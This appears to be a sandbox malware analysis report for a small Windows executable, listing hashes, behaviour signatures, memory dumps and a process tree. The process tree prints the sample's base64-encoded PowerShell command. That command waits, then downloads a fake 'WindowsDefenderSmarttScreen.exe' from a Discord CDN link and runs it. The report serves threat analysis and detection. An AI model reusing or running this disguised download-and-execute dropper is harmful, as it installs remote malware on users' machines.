Overview

overview

8

Static

static

SecuriteIn...97.exe

windows7-x64

8

SecuriteIn...97.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    79s
  • max time network
    82s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-12-2022 10:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SecuriteInfo.com.Variant.Marsilia.2083.9036.16697.exe

  • Size

    5KB

  • MD5

    76a7ebc14b56ff57b127630fa4d10df4

  • SHA1

    b8641767f98da027ded8472ee43a7fa01e4855fb

  • SHA256

    fac5d98032b75f647d81a2e6ba452be1ffe03ea4293641db6d1bc68d7c23a3ad

  • SHA512

    818750af409f30426c26b8e5c5e8ef25faa13486bad738619d85c72bf09c2e2943efde13764e0a28d8cab5dda0ed5cbad3afbe66d01bb7e58d3d23f455243aa7

  • SSDEEP

    96:y879lZCFmOKd4Xthbvk+I0AY0sxvk+Iz8Bv8d3ojGrl:yK9loFZKdmfvkTYJvkZW8d7

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Marsilia.2083.9036.16697.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Marsilia.2083.9036.16697.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAcgBkACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANAA5ADYAMQA5ADYAOAAzADkANAAzADEAMQAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGEAYQBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAegBzAGUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZgBqAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANgAuAGUAeABlACcAKQApADwAIwB3AHQAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHgAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABjAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANgAuAGUAeABlACcAKQA8ACMAcgBrAHQAIwA+AA=="
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1696

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1696-135-0x00007FFABAA90000-0x00007FFABB551000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1696-136-0x0000014F7FA40000-0x0000014F7FA62000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1696-137-0x00007FFABAA90000-0x00007FFABB551000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1696-138-0x00007FFABAA90000-0x00007FFABB551000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4916-132-0x0000000000440000-0x0000000000448000-memory.dmp

    Filesize

    32KB

    Download

  • memory/4916-134-0x00007FFABAA90000-0x00007FFABB551000-memory.dmp

    Filesize

    10.8MB

    Download